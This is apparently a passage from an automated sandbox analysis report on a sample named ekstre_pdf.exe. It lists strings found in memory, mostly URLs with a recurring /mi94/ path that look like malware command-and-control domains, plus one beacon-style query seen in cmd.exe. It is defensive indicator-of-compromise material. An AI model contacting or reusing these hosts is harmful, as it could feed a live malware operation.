00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000002.00000003.4299913003.0000000010532000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6276616162.000000001078D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4293727796.000000001052F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3136606160.000000001078B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3128338969.0000000010781000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4295442212.000000001078C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7598622517.000000001078D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2982280367.0000000010781000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3104321870.000000001052F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2982280367.000000001052F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000003.6438808376.0000000010797000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6276616162.000000001078D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3136606160.000000001078B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3128338969.0000000010781000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4295442212.000000001078C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3136883853.0000000010797000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6436638329.000000001078F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2982280367.0000000010781000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7598748613.0000000010799000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2982280367.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4295188799.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3104321870.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4299982424.00000000104FF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000002.00000003.3131449854.000000000D04B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D04B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV
Source: explorer.exe, 00000002.00000002.7589258600.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6431275863.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3101932906.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440429762.000000000D238000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2967197468.000000000D1F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3131168321.000000000D237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000003.6450375411.00000000104FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6433528266.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6271035859.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7596777091.0000000010500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2982280367.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4295188799.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3104321870.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4299982424.00000000104FF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000002.00000002.7598467307.0000000010777000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3137287219.0000000010777000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112925903.0000000010769000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3109861238.000000001075C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2982280367.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4295188799.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3104321870.00000000104FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4299982424.00000000104FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6440311311.0000000010776000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2982280367.000000001074D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3104321870.000000001074D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.4300238617.0000000010778000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000002.00000002.7575424633.000000000A720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.7574869150.0000000009F20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2945890949.0000000002290000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anjin98.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anjin98.com/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anjin98.com/mi94/www.healthinsurancearena.com
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anjin98.com/mi94/www.kevinjasperinc.africa
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anjin98.comReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anotherworldrecord.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anotherworldrecord.com/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anotherworldrecord.com/mi94/www.credit-cards-54889.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anotherworldrecord.comReferer:
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.athle91.com
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.athle91.com/mi94/
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.athle91.com/mi94/www.anjin98.com
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.athle91.comReferer:
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bellvaniamail.com
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bellvaniamail.com/mi94/
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bellvaniamail.com/mi94/www.furniture-42269.com
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bellvaniamail.comReferer:
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bril-kre-l25.buzz
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bril-kre-l25.buzz/mi94/
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bril-kre-l25.buzz/mi94/www.athle91.com
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bril-kre-l25.buzzReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.centracul.online
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.centracul.online/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.centracul.online/mi94/www.iltuosentiero.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.centracul.onlineReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.credit-cards-54889.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.credit-cards-54889.com/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.credit-cards-54889.com/mi94/www.jewelry2adore.biz
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.credit-cards-54889.comReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crosswalkconsulting.co.uk
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crosswalkconsulting.co.uk/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crosswalkconsulting.co.uk/mi94/www.dinero.news
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crosswalkconsulting.co.ukReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dinero.news
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dinero.news/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dinero.news/mi94/www.tmcgroup.africa
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dinero.newsReferer:
Source: explorer.exe, 00000002.00000002.7564911848.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2953287622.0000000004C5F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.furniture-42269.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.furniture-42269.com/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.furniture-42269.com/mi94/www.centracul.online
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.furniture-42269.comReferer:
Source: ekstre_pdf.exe, 00000001.00000001.2824065477.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hanfengmeiye.com
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hanfengmeiye.com/mi94/
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hanfengmeiye.com/mi94/www.sneakersuomo.com
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hanfengmeiye.comReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.healthinsurancearena.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.healthinsurancearena.com/mi94/
Source: cmd.exe, 00000004.00000002.7554925110.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.healthinsurancearena.com/mi94/?_N6l56=meb8sxPObMePe7P8flKxy
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.healthinsurancearena.com/mi94/www.furniture-42269.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.healthinsurancearena.comReferer:
Source: ekstre_pdf.exe, 00000001.00000001.2824065477.0000000000626000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iltuosentiero.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iltuosentiero.com/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iltuosentiero.com/mi94/www.crosswalkconsulting.co.uk
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iltuosentiero.comReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jenniferfalconerrealtor.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jenniferfalconerrealtor.com/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jenniferfalconerrealtor.com/mi94/www.xqan.net
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jenniferfalconerrealtor.comReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jewelry2adore.biz
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jewelry2adore.biz/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jewelry2adore.biz/mi94/www.licensescape.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jewelry2adore.bizReferer:
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kevinjasperinc.africa
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kevinjasperinc.africa/mi94/
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kevinjasperinc.africa/mi94/www.hanfengmeiye.com
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kevinjasperinc.africaReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.licensescape.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.licensescape.com/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.licensescape.com/mi94/www.jenniferfalconerrealtor.com
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.licensescape.comReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.luivix.online
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.luivix.online/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.luivix.onlineReferer:
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sneakersuomo.com
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sneakersuomo.com/mi94/
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sneakersuomo.com/mi94/www.zetuinteriors.africa
Source: explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sneakersuomo.comReferer:
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tmcgroup.africa
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tmcgroup.africa/mi94/
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tmcgroup.africa/mi94/www.zetuinteriors.africa
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.7568896424.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tmcgroup.africaReferer:
Source: ekstre_pdf.exe, 00000001.00000001.2824065477.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: ekstre_pdf.exe, 00000001.00000001.2824065477.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xqan.net
Source: explorer.exe, 00000002.00000003.6279125118.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6451018729.0000000008FB9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xqan.net/mi94/
